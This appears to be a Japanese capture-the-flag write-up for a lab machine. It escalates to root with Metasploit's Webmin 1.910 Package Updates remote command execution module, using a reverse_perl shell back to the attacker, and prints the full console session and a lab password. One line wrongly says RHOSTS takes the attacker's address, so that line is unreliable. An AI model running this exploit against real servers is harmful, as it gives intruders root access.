redis@Postman:~$ su - Matt Password: Matt@Postman:~$ Matt@Postman:~$ ls -ltr total 4 -rw-rw---- 1 Matt Matt 33 Mar 25 03:45 user.txt Matt@Postman:~$ cat user.txt
権限昇格
webminについて、Mattのアカウントで入った所、入れた。
ただ、ダッシュボードを見てもあまり面白い画面は特にない。
webminのバージョンが1.910なので、面白い情報がないか調べてみる。
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
パッケージアップデートを利用したリモートコード実行の脆弱性があった。
今回はMetasploitが使えそうなので、久々に使うことにした。
┌──(kali㉿kali)-[~] └─$ msfconsole Metasploit tip: Use the resource command to run commands from a file msf6 > search CVE-2019-12840 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/webmin_packageup_rce msf6 > use 0 [*] Using configured payload cmd/unix/reverse_perl msf6 exploit(linux/http/webmin_packageup_rce) > show options Module options (exploit/linux/http/webmin_packageup_rce): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Webmin Password Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U sing-Metasploit RPORT 10000 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base path for Webmin application USERNAME yes Webmin Username VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_perl): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Webmin <= 1.910 msf6 exploit(linux/http/webmin_packageup_rce) >
いくつかパラメータの設定が必要だったので、確認する。
RHOSTSはKali Linuxのtun0のIPアドレスを入れること。
msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008 PASSWORD => computer2008 msf6 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.129.2.1 RHOSTS => 10.129.2.1 msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true [!] Changing the SSL option's value may require changing RPORT! SSL => true msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt USERNAME => Matt msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST <Kali Linuxのtun0 IPアドレス> LHOST => <Kali Linuxのtun0 IPアドレス> msf6 exploit(linux/http/webmin_packageup_rce) >
いざ実行。無事root.txt確保。
msf6 exploit(linux/http/webmin_packageup_rce) > exploit [*] Started reverse TCP handler on <Kali Linuxのtun0 IPアドレス>:4444 [+] Session cookie: 4dfe5e48635ef91df94ddf1bdd2ef17e [*] Attempting to execute the payload... [*] Command shell session 2 opened (<Kali Linuxのtun0 IPアドレス>:4444 -> 10.129.2.1:33812 ) at 2022-03-25 21:33:36 +0900 id uid=0(root) gid=0(root) groups=0(root) pwd /usr/share/webmin/package-updates ls /root/ redis-5.0.0 root.txt cat /root/root.txt
